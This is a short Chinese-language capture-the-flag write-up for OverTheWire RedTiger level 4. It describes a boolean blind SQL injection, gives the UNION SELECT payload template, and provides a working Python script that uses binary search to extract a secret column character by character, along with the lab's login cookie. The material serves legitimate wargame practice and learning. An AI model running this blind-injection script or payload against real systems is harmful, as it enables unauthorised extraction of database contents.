(第一次用requests.get,第一次盲注字段值长度。以后忘了可以回来再忘一次)
提示盲注。点击click me会get[?id=1],回显的行数写在quert returned i rows里。此时回显1行
尝试输入:id=1 union select 1,2 from level4_secret #回显2行,说明可以在后面加where和布尔值
构造payload:
1 union select 1,2 from level4_secret where [bool] #
[bool]里边塞布尔表达式
脚本如下
import requests
url = 'http://redtiger.labs.overthewire.org/level4.php'
flag_true='Query returned 2 rows.'
result = ''
cookies = {'level4login' : 'put_the_kitten_on_your_head'}
for i in range(1,22):#左闭右开
'''
high = 50
low = 0'''
high = 127
low = 32
mid = (high + low) // 2
while high > low:
#字长21
#bool="length((select keyword from level4_secret))>{}".format(mid)
#字段值
bool="ascii(mid((select keyword from level4_secret),{index},1))>{char}".format(index=i, char=mid)#length(())双重括号不能省
payload="1 union select 1,2 from level4_secret where {boolean} #".format(boolean=bool)
data = {'id':payload}
response = requests.get(url=url, params=data,cookies=cookies)
if flag_true in response.text:
low = mid + 1
else:
high = mid
mid = (high + low) // 2
print("i="+str(i))
#result += str(mid)
result+=chr(mid)
print(result)
print("output:"+result)
后记:EDG牛逼!Let's go Navi!